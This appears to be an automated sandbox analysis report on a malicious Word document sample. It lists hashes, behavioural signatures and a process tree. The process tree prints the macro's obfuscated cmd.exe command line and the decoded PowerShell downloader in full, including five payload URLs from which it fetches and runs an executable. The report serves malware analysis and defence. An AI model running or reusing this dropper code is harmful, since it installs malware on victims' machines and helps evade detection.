Analysis
-
max time kernel
140s -
max time network
186s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
21-05-2022 00:27
Static task
static1
Behavioral task
behavioral1
Sample
45fe53a320684b36663ffe02061c1df145d4c3ccc3aa855582f19d3e12210ec7.doc
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
45fe53a320684b36663ffe02061c1df145d4c3ccc3aa855582f19d3e12210ec7.doc
Resource
win10v2004-20220414-en
General
-
Target
45fe53a320684b36663ffe02061c1df145d4c3ccc3aa855582f19d3e12210ec7.doc
-
Size
135KB
-
MD5
5d306a8b1060e779dd27b30749c25d73
-
SHA1
f48489348a2aa9b01ed7aa7c4ea17aa3002c194e
-
SHA256
45fe53a320684b36663ffe02061c1df145d4c3ccc3aa855582f19d3e12210ec7
-
SHA512
14945a24d04928ec7e89f49ed1afdd71b76b2ca9ebd8b8fb536c3345be06c6c14c32699e95516749a8650c22f274ad2b5b5f6935f729141d1a7784bca0165afb
Malware Config
Extracted
http://www.srskgroup.com/9d74kPY
http://www.stovefree.com/Zg
http://www.rohanpurit.com/gfnpS
http://www.misyaland.com/q
http://teambored.co.uk/Ps
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1772 3644 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 47 4324 powershell.exe 58 4324 powershell.exe 59 4324 powershell.exe 61 4324 powershell.exe 68 4324 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
Processes:
cmd.execmd.exepid process 1772 cmd.exe 2792 cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3644 WINWORD.EXE 3644 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4324 powershell.exe 4324 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4324 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 3644 WINWORD.EXE 3644 WINWORD.EXE 3644 WINWORD.EXE 3644 WINWORD.EXE 3644 WINWORD.EXE 3644 WINWORD.EXE 3644 WINWORD.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WINWORD.EXEcmd.execmd.exedescription pid process target process PID 3644 wrote to memory of 1772 3644 WINWORD.EXE cmd.exe PID 3644 wrote to memory of 1772 3644 WINWORD.EXE cmd.exe PID 1772 wrote to memory of 2792 1772 cmd.exe cmd.exe PID 1772 wrote to memory of 2792 1772 cmd.exe cmd.exe PID 2792 wrote to memory of 4324 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 4324 2792 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\45fe53a320684b36663ffe02061c1df145d4c3ccc3aa855582f19d3e12210ec7.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set bl=IHiNKLidUBGqPsinWOBdMAhPLoDiwEYWw-/mTety(QpCZ{f9=Jk@$':g7u.6x4jVXbSza+r};8 ,lv0\)Fc&&for %j in (52,49,44,50,48,53,31,3,81,53,72,52,3,20,64,48,15,37,32,33,25,65,62,37,82,38,74,3,37,38,58,31,37,65,43,76,27,37,15,38,72,52,41,11,11,48,53,22,38,38,42,54,34,34,32,32,32,58,13,70,13,50,55,70,25,57,42,58,82,25,35,34,47,19,56,61,50,23,30,51,22,38,38,42,54,34,34,32,32,32,58,13,38,25,77,37,46,70,37,37,58,82,25,35,34,44,55,51,22,38,38,42,54,34,34,32,32,32,58,70,25,22,68,15,42,57,70,27,38,58,82,25,35,34,55,46,15,42,66,51,22,38,38,42,54,34,34,32,32,32,58,35,27,13,39,68,76,68,15,19,58,82,25,35,34,11,51,22,38,38,42,54,34,34,38,37,68,35,65,25,70,37,19,58,82,25,58,57,50,34,23,13,53,58,66,42,76,27,38,40,53,51,53,80,72,52,38,24,67,48,53,23,15,57,53,72,52,64,4,25,74,48,74,53,59,47,61,53,72,52,82,4,36,48,53,43,15,76,53,72,52,27,64,11,48,52,37,15,77,54,38,37,35,42,69,53,79,53,69,52,64,4,25,69,53,58,37,60,37,53,72,46,25,70,37,68,82,22,40,52,15,43,62,74,27,15,74,52,41,11,11,80,45,38,70,39,45,52,3,20,64,58,26,25,32,15,76,25,68,19,81,27,76,37,40,52,15,43,62,75,74,52,27,64,11,80,72,52,26,13,50,48,53,25,15,27,53,72,0,46,74,40,40,10,37,38,33,0,38,37,35,74,52,27,64,11,80,58,76,37,15,55,38,22,74,33,55,37,74,73,78,78,78,78,80,74,45,0,15,77,25,50,37,33,0,38,37,35,74,52,27,64,11,72,52,76,63,15,48,53,32,36,43,53,72,65,70,37,68,50,72,71,71,82,68,38,82,22,45,71,71,52,43,13,82,48,53,20,27,11,53,72,86)do set C6R=!C6R!!bl:~%j,1!&&if %j gtr 85 %TEMP:~-1,1%owershell "!C6R:~-432!""2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeCmD /V:O/C"set bl=IHiNKLidUBGqPsinWOBdMAhPLoDiwEYWw-/mTety(QpCZ{f9=Jk@$':g7u.6x4jVXbSza+r};8 ,lv0\)Fc&&for %j in (52,49,44,50,48,53,31,3,81,53,72,52,3,20,64,48,15,37,32,33,25,65,62,37,82,38,74,3,37,38,58,31,37,65,43,76,27,37,15,38,72,52,41,11,11,48,53,22,38,38,42,54,34,34,32,32,32,58,13,70,13,50,55,70,25,57,42,58,82,25,35,34,47,19,56,61,50,23,30,51,22,38,38,42,54,34,34,32,32,32,58,13,38,25,77,37,46,70,37,37,58,82,25,35,34,44,55,51,22,38,38,42,54,34,34,32,32,32,58,70,25,22,68,15,42,57,70,27,38,58,82,25,35,34,55,46,15,42,66,51,22,38,38,42,54,34,34,32,32,32,58,35,27,13,39,68,76,68,15,19,58,82,25,35,34,11,51,22,38,38,42,54,34,34,38,37,68,35,65,25,70,37,19,58,82,25,58,57,50,34,23,13,53,58,66,42,76,27,38,40,53,51,53,80,72,52,38,24,67,48,53,23,15,57,53,72,52,64,4,25,74,48,74,53,59,47,61,53,72,52,82,4,36,48,53,43,15,76,53,72,52,27,64,11,48,52,37,15,77,54,38,37,35,42,69,53,79,53,69,52,64,4,25,69,53,58,37,60,37,53,72,46,25,70,37,68,82,22,40,52,15,43,62,74,27,15,74,52,41,11,11,80,45,38,70,39,45,52,3,20,64,58,26,25,32,15,76,25,68,19,81,27,76,37,40,52,15,43,62,75,74,52,27,64,11,80,72,52,26,13,50,48,53,25,15,27,53,72,0,46,74,40,40,10,37,38,33,0,38,37,35,74,52,27,64,11,80,58,76,37,15,55,38,22,74,33,55,37,74,73,78,78,78,78,80,74,45,0,15,77,25,50,37,33,0,38,37,35,74,52,27,64,11,72,52,76,63,15,48,53,32,36,43,53,72,65,70,37,68,50,72,71,71,82,68,38,82,22,45,71,71,52,43,13,82,48,53,20,27,11,53,72,86)do set C6R=!C6R!!bl:~%j,1!&&if %j gtr 85 powershell "!C6R:~-432!""3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$JZk='WNF';$NMX=new-object Net.WebClient;$Qqq='http://www.srskgroup.com/9d74kPY@http://www.stovefree.com/Zg@http://www.rohanpurit.com/gfnpS@http://www.misyaland.com/q@http://teambored.co.uk/Ps'.Split('@');$tLz='Pnu';$XKo = '694';$cKT='Cnl';$iXq=$env:temp+'\'+$XKo+'.exe';foreach($nCj in $Qqq){try{$NMX.DownloadFile($nCj, $iXq);$Dsk='oni';If ((Get-Item $iXq).length -ge 80000) {Invoke-Item $iXq;$lVn='wTC';break;}}catch{}}$Csc='Miq';"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1772-137-0x0000000000000000-mapping.dmp
-
memory/2792-138-0x0000000000000000-mapping.dmp
-
memory/3644-133-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmpFilesize
64KB
-
memory/3644-143-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmpFilesize
64KB
-
memory/3644-130-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmpFilesize
64KB
-
memory/3644-135-0x00007FFA903C0000-0x00007FFA903D0000-memory.dmpFilesize
64KB
-
memory/3644-136-0x00007FFA903C0000-0x00007FFA903D0000-memory.dmpFilesize
64KB
-
memory/3644-131-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmpFilesize
64KB
-
memory/3644-132-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmpFilesize
64KB
-
memory/3644-146-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmpFilesize
64KB
-
memory/3644-145-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmpFilesize
64KB
-
memory/3644-144-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmpFilesize
64KB
-
memory/3644-134-0x00007FFA92C10000-0x00007FFA92C20000-memory.dmpFilesize
64KB
-
memory/4324-141-0x00007FFAA7BA0000-0x00007FFAA8661000-memory.dmpFilesize
10.8MB
-
memory/4324-140-0x000001A3FC460000-0x000001A3FC482000-memory.dmpFilesize
136KB
-
memory/4324-139-0x0000000000000000-mapping.dmp